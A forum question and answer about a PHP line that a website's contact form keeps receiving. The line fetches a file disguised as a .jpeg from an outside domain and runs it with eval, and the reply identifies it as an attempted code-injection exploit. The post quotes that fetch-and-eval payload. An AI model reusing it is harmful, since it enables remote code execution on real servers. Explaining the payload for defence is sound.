Sérey
Reputation: 1
I don't understand some php code that is inserted in an e-mail we receive
My client tells me that he regularly receives in his email box (linked to his contact form on his own website) this type of message:
-----Message d'origine----- De : Envoyé : Aucune Objet :
$a = get_contents('http://********.com.co//wp-admin/images/pel.jpeg'); eval('?>'.$a);
I replaced the domain name in the url by **** for confidentiality reasons. The domain name in the url of the get_contents function is unknown to us.
Do you have any idea what it could be? Spam ? Bad configuration ? Thanks in advance for your advice !
Upvotes: 0
Views: 31
Answers (1)
Quentin
Reputation: 943996
It's an attempt to exploit (an apparently non-existent) code injection vulnerability. The use of eval is a dead giveaway.
Upvotes: 2
Related Questions
- How does this "require" statement with a dynamic filepath work?
- Can anyone explain the following PHP Code?
- How does this line php code work?
- What does this line of PHP code do?
- Can someone explain this piece of PHP code?
- what's the code meaning?
- Can you help me understand this php script
- meaning of the following php code?
- can someone explain what this php code is doing or its purpose